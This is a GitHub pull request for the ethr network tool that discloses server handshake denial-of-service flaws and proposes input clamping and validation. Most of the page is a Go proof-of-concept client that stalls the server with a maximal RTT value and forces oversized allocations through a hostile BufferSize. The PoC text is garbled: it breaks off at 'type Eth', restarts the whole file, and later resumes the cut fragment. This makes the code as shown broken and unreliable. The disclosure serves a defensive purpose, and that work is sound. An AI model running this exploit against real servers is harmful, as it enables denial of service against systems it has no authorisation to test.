Skip to content

Denial of service mitigation / server handshake hardening#188

Open
fereidani wants to merge 3 commits into
microsoft:masterfrom
fereidani:fix/server-handshake-hardening
Open

Denial of service mitigation / server handshake hardening#188
fereidani wants to merge 3 commits into
microsoft:masterfrom
fereidani:fix/server-handshake-hardening

Conversation

@fereidani

Copy link
Copy Markdown

Hi,

Note: this bug was first reported to Microsoft security team and they cleared it for public disclosure

I've been working on a static analyzer for Go called Ghoul, and I ran it against the Ethr codebase. It surfaced a couple of issues in the server's session-handshake path, which this PR addresses along with some related hardening of the same code.

Ghoul related reports:

ethr/server.go:283:27: [oversized-allocation] untrusted data from gob deserialized data flows into github.com/microsoft/ethr.srvrRunTCPBandwidthTest which passes it to a oversized-allocation sink (confidence: 9.8/10, CWE-789)
  --> ethr/session.go:433:23: source:      gob deserialized data
  --> ethr/server.go:283:27: sink:        github.com/microsoft/ethr.srvrRunTCPBandwidthTest
ethr/server.go:286:25: [oversized-allocation] untrusted data from gob deserialized data flows into github.com/microsoft/ethr.srvrRunTCPLatencyTest which passes it to a oversized-allocation sink (confidence: 9.8/10, CWE-789)
  --> ethr/session.go:433:23: source:      gob deserialized data
  --> ethr/server.go:286:25: sink:        github.com/microsoft/ethr.srvrRunTCPLatencyTest
server.go:171:13: [oversized-timeout] an attacker-controlled duration used as timeout/duration in time.Sleep may cause denial of service or a non-expiring session (confidence: 8.3/10, CWE-400)
server.go:65:26: [unused-parameter] parameter 'test' is not used in the function body; a different parameter may have been intended (confidence: 6.4/10)

The server deserializes session messages and client parameters straight off the TCP connection, so the changes below make sure none of those values are trusted unchecked:

  • Clamp the half-RTT sleep in the single-client sync path to a bounded duration. The RTT arrives from the client in the SyncGo message, so capping it (and treating negative values as zero) keeps a hostile value from pinning the connection goroutine.
  • Nil-check the Syn and SyncGo payloads before they are dereferenced. A malformed message can decode with a nil payload pointer even when its Type field matches the expected value.
  • Validate client-supplied BufferSize and RttCount against sane bounds before the server allocates buffers or runs the latency loop, since both come from the client's SYN message.
  • Remove the unused test parameter from handshakeWithClient.

POC:

// Proof-of-concept client for two attacker-controlled issues in microsoft/ethr's
// server session handling:
//
//   time    - a malicious SyncGo.RttNs drives the server's time.Sleep in the
//             single-client sync handshake (oversized-timeout / DoS).
//   buffer  - a malicious SYN BufferSize drives make([]byte, ...) in the latency
//             test (uncontrolled allocation / DoS).
//
// It speaks ethr's session protocol directly (4-byte big-endian length prefix +
// gob-encoded EthrMsg), so the type definitions below mirror session.go exactly.
package main

import (
	"bytes"
	"encoding/binary"
	"encoding/gob"
	"fmt"
	"io"
	"math"
	"net"
	"os"
	"strconv"
	"strings"
	"time"
)

// --- session protocol types (mirror of ethr session.go) ---

type EthrTestType uint32

const (
	All EthrTestType = iota
	Bandwidth
	Cps
	Pps
	Latency
)

type EthrProtocol uint32

const (
	TCP EthrProtocol = iota
	UDP
	ICMP
)

type EthrTestID struct {
	Protocol EthrProtocol
	Type     EthrTestType
}

type EthrMsgType uint32

const (
	EthrInv EthrMsgType = iota
	EthrSyn
	EthrAck
	EthrSyncStart
	EthrSyncReady
	EthrSyncGo
)

type EthrMsgVer uint32

type EthrMsg struct {
	Version   EthrMsgVer
	Type      EthrMsgType
	Syn       *EthrMsgSyn
	Ack       *EthrMsgAck
	SyncStart *EthrMsgSyncStart
	SyncReady *EthrMsgSyncReady
	SyncGo    *EthrMsgSyncGo
}

type Eth// Proof-of-concept client for two attacker-controlled issues in microsoft/ethr's
// server session handling:
//
//   time    - a malicious SyncGo.RttNs drives the server's time.Sleep in the
//             single-client sync handshake (oversized-timeout / DoS).
//   buffer  - a malicious SYN BufferSize drives make([]byte, ...) in the latency
//             test (uncontrolled allocation / DoS).
//
// It speaks ethr's session protocol directly (4-byte big-endian length prefix +
// gob-encoded EthrMsg), so the type definitions below mirror session.go exactly.
package main

import (
	"bytes"
	"encoding/binary"
	"encoding/gob"
	"fmt"
	"io"
	"math"
	"net"
	"os"
	"strconv"
	"strings"
	"time"
)

// --- session protocol types (mirror of ethr session.go) ---

type EthrTestType uint32

const (
	All EthrTestType = iota
	Bandwidth
	Cps
	Pps
	Latency
)

type EthrProtocol uint32

const (
	TCP EthrProtocol = iota
	UDP
	ICMP
)

type EthrTestID struct {
	Protocol EthrProtocol
	Type     EthrTestType
}

type EthrMsgType uint32

const (
	EthrInv EthrMsgType = iota
	EthrSyn
	EthrAck
	EthrSyncStart
	EthrSyncReady
	EthrSyncGo
)

type EthrMsgVer uint32

type EthrMsg struct {
	Version   EthrMsgVer
	Type      EthrMsgType
	Syn       *EthrMsgSyn
	Ack       *EthrMsgAck
	SyncStart *EthrMsgSyncStart
	SyncReady *EthrMsgSyncReady
	SyncGo    *EthrMsgSyncGo
}

type EthrMsgSyn struct {
	TestID      EthrTestID
	ClientParam EthrClientParam
}

type EthrMsgAck struct{}

type EthrMsgSyncStart struct{}

type EthrMsgSyncReady struct {
	DelayNs int64
}

type EthrMsgSyncGo struct {
	RttNs int64
}

type EthrClientParam struct {
	NumThreads  uint32
	BufferSize  uint32
	RttCount    uint32
	Reverse     bool
	Duration    time.Duration
	Gap         time.Duration
	WarmupCount uint32
	BwRate      uint64
	ToS         uint8
}

// --- wire framing (mirror of ethr sendSessionMsg / recvSessionMsg) ---

func sendMsg(conn net.Conn, m *EthrMsg) error {
	var buf bytes.Buffer
	if err := gob.NewEncoder(&buf).Encode(m); err != nil {
		return err
	}
	var lenbuf [4]byte
	binary.BigEndian.PutUint32(lenbuf[:], uint32(buf.Len()))
	if _, err := conn.Write(lenbuf[:]); err != nil {
		return err
	}
	_, err := conn.Write(buf.Bytes())
	return err
}

func recvMsg(conn net.Conn) (*EthrMsg, error) {
	var lenbuf [4]byte
	if _, err := io.ReadFull(conn, lenbuf[:]); err != nil {
		return nil, err
	}
	n := binary.BigEndian.Uint32(lenbuf[:])
	if n == 0 || n > 16384 {
		return nil, fmt.Errorf("bad message size %d", n)
	}
	payload := make([]byte, n)
	if _, err := io.ReadFull(conn, payload); err != nil {
		return nil, err
	}
	var m EthrMsg
	if err := gob.NewDecoder(bytes.NewReader(payload)).Decode(&m); err != nil {
		return nil, err
	}
	return &m, nil
}

// readRSS returns the server's resident set size in kB, or -1 if unavailable.
func readRSS(pid int) int64 {
	if pid <= 0 {
		return -1
	}
	b, err := os.ReadFile(fmt.Sprintf("/proc/%d/status", pid))
	if err != nil {
		return -1
	}
	for _, line := range strings.Split(string(b), "\n") {
		if strings.HasPrefix(line, "VmRSS:") {
			f := strings.Fields(line)
			if len(f) >= 2 {
				n, _ := strconv.ParseInt(f[1], 10, 64)
				return n
			}
		}
	}
	return -1
}

func dial(addr string) net.Conn {
	conn, err := net.Dial("tcp", addr)
	if err != nil {
		fmt.Printf("dial %s failed: %v\n", addr, err)
		os.Exit(1)
	}
	return conn
}

// runTimePoC drives a TCP Bandwidth (reverse) test through the single-client
// sync handshake and sends a hostile SyncGo.RttNs, then times how long the
// server takes to send the first byte of bandwidth data.
func runTimePoC(addr string) {
	conn := dial(addr)
	defer conn.Close()

	syn := &EthrMsg{
		Version: 0,
		Type:    EthrSyn,
		Syn: &EthrMsgSyn{
			TestID: EthrTestID{Protocol: TCP, Type: Bandwidth},
			ClientParam: EthrClientParam{
				NumThreads: 1, BufferSize: 1024, RttCount: 1, Reverse: true,
				Duration: 60 * time.Second, Gap: time.Second, WarmupCount: 1,
			},
		},
	}
	if err := sendMsg(conn, syn); err != nil {
		fmt.Printf("send SYN failed: %v\n", err)
		return
	}
	if _, err := recvMsg(conn); err != nil { // server ACK
		fmt.Printf("recv ACK failed: %v\n", err)
		return
	}
	if err := sendMsg(conn, &EthrMsg{Version: 0, Type: EthrSyncStart, SyncStart: &EthrMsgSyncStart{}}); err != nil {
		fmt.Printf("send SyncStart failed: %v\n", err)
		return
	}
	if _, err := recvMsg(conn); err != nil { // server SyncReady
		fmt.Printf("recv SyncReady failed: %v\n", err)
		return
	}

	hostile := int64(math.MaxInt64)
	fmt.Printf("Sending SyncGo with RttNs=%d (≈ %.0f years as a sleep)\n", hostile, float64(hostile/int64(time.Second))/60/60/24/365.25)
	if err := sendMsg(conn, &EthrMsg{Version: 0, Type: EthrSyncGo, SyncGo: &EthrMsgSyncGo{RttNs: hostile}}); err != nil {
		fmt.Printf("send SyncGo failed: %v\n", err)
		return
	}

	start := time.Now()
	buf := make([]byte, 1024)
	conn.SetReadDeadline(time.Now().Add(5 * time.Second))
	n, err := conn.Read(buf)
	elapsed := time.Since(start)
	if err != nil {
		fmt.Printf("RESULT[time]: NO server data within 5s (%v); elapsed=%v -> server STALLED on attacker-controlled RTT (VULNERABLE)\n", err, elapsed)
		return
	}
	fmt.Printf("RESULT[time]: server sent %d bytes after %v -> sleep was bounded (FIXED)\n", n, elapsed.Round(10*time.Millisecond))
}

// runBufferPoC sends a SYN for a TCP Bandwidth test with a hostile BufferSize
// and then stays quiet: the server's sync probe times out (no SyncStart) and it
// falls through to srvrRunTCPBandwidthTest, which does make([]byte, BufferSize).
// It reports whether the server accepted it (and how much memory it allocated)
// or rejected the connection.
func runBufferPoC(addr string, size uint32, serverPid int) {
	conn := dial(addr)
	defer conn.Close()

	rssBefore := readRSS(serverPid)
	syn := &EthrMsg{
		Version: 0,
		Type:    EthrSyn,
		Syn: &EthrMsgSyn{
			TestID: EthrTestID{Protocol: TCP, Type: Bandwidth},
			ClientParam: EthrClientParam{
				NumThreads: 1, BufferSize: size, RttCount: 1,
				Duration: 60 * time.Second, Gap: time.Second, WarmupCount: 1,
			},
		},
	}
	if err := sendMsg(conn, syn); err != nil {
		fmt.Printf("send SYN failed: %v\n", err)
		return
	}
	if _, err := recvMsg(conn); err != nil { // server ACK
		fmt.Printf("RESULT[buffer]: server closed before/during ACK (%v) -> REJECTED (FIXED)\n", err)
		return
	}

	// Let the server time out its sync probe and reach the allocation, sampling RSS.
	var rssPeak int64
	for i := 0; i < 10; i++ {
		time.Sleep(250 * time.Millisecond)
		if r := readRSS(serverPid); r > rssPeak {
			rssPeak = r
		}
	}

	// Probe: a rejected server closes the conn (EOF/reset); an accepted server
	// is blocked reading from us, so this read times out.
	conn.SetReadDeadline(time.Now().Add(1 * time.Second))
	_, err := conn.Read(make([]byte, 1))
	switch {
	case err == nil:
		fmt.Printf("RESULT[buffer]: unexpected data (BufferSize=%d)\n", size)
	case err == io.EOF || strings.Contains(err.Error(), "reset") || strings.Contains(err.Error(), "closed"):
		fmt.Printf("RESULT[buffer]: BufferSize=%d -> server REJECTED the connection (RSS %d->%d kB peak) -> FIXED (no allocation)\n", size, rssBefore, rssPeak)
	default:
		delta := rssPeak - rssBefore
		fmt.Printf("RESULT[buffer]: BufferSize=%d -> server ACCEPTED and allocated (RSS %d->%d kB, +%d kB ≈ %.0f MB) -> VULNERABLE\n",
			size, rssBefore, rssPeak, delta, float64(delta)/1024.0)
	}
}

func main() {
	if len(os.Args) < 3 {
		fmt.Println("usage: poc time <addr>")
		fmt.Println("       poc buffer <addr> <size-bytes> [server-pid]")
		os.Exit(2)
	}
	switch os.Args[1] {
	case "time":
		runTimePoC(os.Args[2])
	case "buffer":
		if len(os.Args) < 4 {
			fmt.Println("buffer mode needs: <addr> <size-bytes> [server-pid]")
			os.Exit(2)
		}
		size, _ := strconv.ParseUint(os.Args[3], 10, 64)
		pid := 0
		if len(os.Args) >= 5 {
			pid, _ = strconv.Atoi(os.Args[4])
		}
		runBufferPoC(os.Args[2], uint32(size), pid)
	default:
		fmt.Println("unknown mode:", os.Args[1])
		os.Exit(2)
	}
}rMsgSyn struct {
	TestID      EthrTestID
	ClientParam EthrClientParam
}

type EthrMsgAck struct{}

type EthrMsgSyncStart struct{}

type EthrMsgSyncReady struct {
	DelayNs int64
}

type EthrMsgSyncGo struct {
	RttNs int64
}

type EthrClientParam struct {
	NumThreads  uint32
	BufferSize  uint32
	RttCount    uint32
	Reverse     bool
	Duration    time.Duration
	Gap         time.Duration
	WarmupCount uint32
	BwRate      uint64
	ToS         uint8
}

// --- wire framing (mirror of ethr sendSessionMsg / recvSessionMsg) ---

func sendMsg(conn net.Conn, m *EthrMsg) error {
	var buf bytes.Buffer
	if err := gob.NewEncoder(&buf).Encode(m); err != nil {
		return err
	}
	var lenbuf [4]byte
	binary.BigEndian.PutUint32(lenbuf[:], uint32(buf.Len()))
	if _, err := conn.Write(lenbuf[:]); err != nil {
		return err
	}
	_, err := conn.Write(buf.Bytes())
	return err
}

func recvMsg(conn net.Conn) (*EthrMsg, error) {
	var lenbuf [4]byte
	if _, err := io.ReadFull(conn, lenbuf[:]); err != nil {
		return nil, err
	}
	n := binary.BigEndian.Uint32(lenbuf[:])
	if n == 0 || n > 16384 {
		return nil, fmt.Errorf("bad message size %d", n)
	}
	payload := make([]byte, n)
	if _, err := io.ReadFull(conn, payload); err != nil {
		return nil, err
	}
	var m EthrMsg
	if err := gob.NewDecoder(bytes.NewReader(payload)).Decode(&m); err != nil {
		return nil, err
	}
	return &m, nil
}

// readRSS returns the server's resident set size in kB, or -1 if unavailable.
func readRSS(pid int) int64 {
	if pid <= 0 {
		return -1
	}
	b, err := os.ReadFile(fmt.Sprintf("/proc/%d/status", pid))
	if err != nil {
		return -1
	}
	for _, line := range strings.Split(string(b), "\n") {
		if strings.HasPrefix(line, "VmRSS:") {
			f := strings.Fields(line)
			if len(f) >= 2 {
				n, _ := strconv.ParseInt(f[1], 10, 64)
				return n
			}
		}
	}
	return -1
}

func dial(addr string) net.Conn {
	conn, err := net.Dial("tcp", addr)
	if err != nil {
		fmt.Printf("dial %s failed: %v\n", addr, err)
		os.Exit(1)
	}
	return conn
}

// runTimePoC drives a TCP Bandwidth (reverse) test through the single-client
// sync handshake and sends a hostile SyncGo.RttNs, then times how long the
// server takes to send the first byte of bandwidth data.
func runTimePoC(addr string) {
	conn := dial(addr)
	defer conn.Close()

	syn := &EthrMsg{
		Version: 0,
		Type:    EthrSyn,
		Syn: &EthrMsgSyn{
			TestID: EthrTestID{Protocol: TCP, Type: Bandwidth},
			ClientParam: EthrClientParam{
				NumThreads: 1, BufferSize: 1024, RttCount: 1, Reverse: true,
				Duration: 60 * time.Second, Gap: time.Second, WarmupCount: 1,
			},
		},
	}
	if err := sendMsg(conn, syn); err != nil {
		fmt.Printf("send SYN failed: %v\n", err)
		return
	}
	if _, err := recvMsg(conn); err != nil { // server ACK
		fmt.Printf("recv ACK failed: %v\n", err)
		return
	}
	if err := sendMsg(conn, &EthrMsg{Version: 0, Type: EthrSyncStart, SyncStart: &EthrMsgSyncStart{}}); err != nil {
		fmt.Printf("send SyncStart failed: %v\n", err)
		return
	}
	if _, err := recvMsg(conn); err != nil { // server SyncReady
		fmt.Printf("recv SyncReady failed: %v\n", err)
		return
	}

	hostile := int64(math.MaxInt64)
	fmt.Printf("Sending SyncGo with RttNs=%d (≈ %.0f years as a sleep)\n", hostile, float64(hostile/int64(time.Second))/60/60/24/365.25)
	if err := sendMsg(conn, &EthrMsg{Version: 0, Type: EthrSyncGo, SyncGo: &EthrMsgSyncGo{RttNs: hostile}}); err != nil {
		fmt.Printf("send SyncGo failed: %v\n", err)
		return
	}

	start := time.Now()
	buf := make([]byte, 1024)
	conn.SetReadDeadline(time.Now().Add(5 * time.Second))
	n, err := conn.Read(buf)
	elapsed := time.Since(start)
	if err != nil {
		fmt.Printf("RESULT[time]: NO server data within 5s (%v); elapsed=%v -> server STALLED on attacker-controlled RTT (VULNERABLE)\n", err, elapsed)
		return
	}
	fmt.Printf("RESULT[time]: server sent %d bytes after %v -> sleep was bounded (FIXED)\n", n, elapsed.Round(10*time.Millisecond))
}

// runBufferPoC sends a SYN for a TCP Bandwidth test with a hostile BufferSize
// and then stays quiet: the server's sync probe times out (no SyncStart) and it
// falls through to srvrRunTCPBandwidthTest, which does make([]byte, BufferSize).
// It reports whether the server accepted it (and how much memory it allocated)
// or rejected the connection.
func runBufferPoC(addr string, size uint32, serverPid int) {
	conn := dial(addr)
	defer conn.Close()

	rssBefore := readRSS(serverPid)
	syn := &EthrMsg{
		Version: 0,
		Type:    EthrSyn,
		Syn: &EthrMsgSyn{
			TestID: EthrTestID{Protocol: TCP, Type: Bandwidth},
			ClientParam: EthrClientParam{
				NumThreads: 1, BufferSize: size, RttCount: 1,
				Duration: 60 * time.Second, Gap: time.Second, WarmupCount: 1,
			},
		},
	}
	if err := sendMsg(conn, syn); err != nil {
		fmt.Printf("send SYN failed: %v\n", err)
		return
	}
	if _, err := recvMsg(conn); err != nil { // server ACK
		fmt.Printf("RESULT[buffer]: server closed before/during ACK (%v) -> REJECTED (FIXED)\n", err)
		return
	}

	// Let the server time out its sync probe and reach the allocation, sampling RSS.
	var rssPeak int64
	for i := 0; i < 10; i++ {
		time.Sleep(250 * time.Millisecond)
		if r := readRSS(serverPid); r > rssPeak {
			rssPeak = r
		}
	}

	// Probe: a rejected server closes the conn (EOF/reset); an accepted server
	// is blocked reading from us, so this read times out.
	conn.SetReadDeadline(time.Now().Add(1 * time.Second))
	_, err := conn.Read(make([]byte, 1))
	switch {
	case err == nil:
		fmt.Printf("RESULT[buffer]: unexpected data (BufferSize=%d)\n", size)
	case err == io.EOF || strings.Contains(err.Error(), "reset") || strings.Contains(err.Error(), "closed"):
		fmt.Printf("RESULT[buffer]: BufferSize=%d -> server REJECTED the connection (RSS %d->%d kB peak) -> FIXED (no allocation)\n", size, rssBefore, rssPeak)
	default:
		delta := rssPeak - rssBefore
		fmt.Printf("RESULT[buffer]: BufferSize=%d -> server ACCEPTED and allocated (RSS %d->%d kB, +%d kB ≈ %.0f MB) -> VULNERABLE\n",
			size, rssBefore, rssPeak, delta, float64(delta)/1024.0)
	}
}

func main() {
	if len(os.Args) < 3 {
		fmt.Println("usage: poc time <addr>")
		fmt.Println("       poc buffer <addr> <size-bytes> [server-pid]")
		os.Exit(2)
	}
	switch os.Args[1] {
	case "time":
		runTimePoC(os.Args[2])
	case "buffer":
		if len(os.Args) < 4 {
			fmt.Println("buffer mode needs: <addr> <size-bytes> [server-pid]")
			os.Exit(2)
		}
		size, _ := strconv.ParseUint(os.Args[3], 10, 64)
		pid := 0
		if len(os.Args) >= 5 {
			pid, _ = strconv.Atoi(os.Args[4])
		}
		runBufferPoC(os.Args[2], uint32(size), pid)
	default:
		fmt.Println("unknown mode:", os.Args[1])
		os.Exit(2)
	}
}

@fereidani

Copy link
Copy Markdown
Author

@microsoft-github-policy-service agree

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Labels

None yet

Projects

None yet

Development

Successfully merging this pull request may close these issues.

1 participant